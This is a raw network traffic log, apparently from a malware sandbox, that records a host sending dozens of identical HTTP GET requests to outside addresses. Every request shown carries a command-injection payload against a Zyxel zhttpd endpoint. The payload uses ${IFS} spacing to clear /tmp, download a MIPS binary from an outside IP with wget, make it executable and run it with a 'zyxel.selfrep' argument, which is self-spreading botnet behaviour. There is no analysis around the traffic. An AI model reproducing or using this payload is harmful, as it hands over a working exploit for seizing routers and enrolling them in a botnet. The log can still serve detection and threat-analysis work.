                                                Jan 28, 2024 10:16:15.664985895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1987192.168.2.234918812.196.95.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664995909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1988192.168.2.2358626221.141.34.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665033102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1989192.168.2.2334772187.129.100.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665060997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1990192.168.2.234070848.250.84.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665072918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1991192.168.2.2339282155.105.224.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665092945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1992192.168.2.234496449.141.56.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665103912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1993192.168.2.2344198165.198.141.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665134907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1994192.168.2.2345280145.250.28.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665155888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1995192.168.2.2338172105.46.167.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665183067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1996192.168.2.2353736108.50.106.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665222883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1997192.168.2.2334310132.166.213.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665251017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1998192.168.2.2341470126.153.232.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665275097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1999192.168.2.234611445.204.201.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665323019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2000192.168.2.2333974178.77.25.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665344000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2001192.168.2.2352688119.42.165.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665359020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2002192.168.2.235793045.52.107.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665400028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2003192.168.2.233647079.240.27.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665442944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2004192.168.2.2350562129.251.88.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665466070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2005192.168.2.2342324102.154.34.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665496111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2006192.168.2.2337176223.129.30.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665525913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2007192.168.2.2359224196.56.170.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665569067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2008192.168.2.23498728.220.90.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665590048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2009192.168.2.2334518121.162.198.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665590048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2010192.168.2.235699678.131.32.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665651083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2011192.168.2.235283437.41.113.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665662050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2012192.168.2.2343888170.240.29.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665699005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2013192.168.2.234218038.240.140.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665714979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2014192.168.2.2343942176.213.117.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665770054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2015192.168.2.235184097.160.118.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665802002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2016192.168.2.234887449.168.26.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665822029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2017192.168.2.2345728163.104.165.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665844917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2018192.168.2.2356898160.14.154.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665880919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2019192.168.2.2339370184.39.255.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665906906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2020192.168.2.233391413.128.133.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665919065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2021192.168.2.234234420.198.212.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665966988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2022192.168.2.236076651.175.120.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.665997982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2023192.168.2.2347960146.36.27.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666023016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2024192.168.2.2344940167.193.77.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666039944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2025192.168.2.2355506139.82.149.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666066885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2026192.168.2.2354080198.22.9.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666090965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2027192.168.2.23375909.190.229.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666100979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2028192.168.2.2356360155.214.167.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666134119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2029192.168.2.233575241.230.177.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666140079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2030192.168.2.2349478107.162.251.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666198969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2031192.168.2.2348928159.108.254.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666218996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2032192.168.2.2338674185.236.136.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666245937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2033192.168.2.2344328134.209.230.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666296959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2034192.168.2.235161671.182.206.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666331053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2035192.168.2.233443663.18.161.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666352034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2036192.168.2.2344296170.186.36.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666394949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2037192.168.2.235775638.32.52.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666413069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2038192.168.2.2333472125.14.17.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666435003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2039192.168.2.2339156201.127.230.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666467905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2040192.168.2.2345752200.75.35.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666502953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2041192.168.2.2359850145.132.9.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666528940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2042192.168.2.235679438.28.204.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666568995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2043192.168.2.234516635.154.55.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666589022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2044192.168.2.235018839.115.163.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666623116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2045192.168.2.2355890164.46.69.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666649103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2046192.168.2.233532039.190.219.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666682005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2047192.168.2.233505239.209.186.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666712046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2048192.168.2.234000888.224.8.71443
                                                TimestampBytes transferredDirectionData
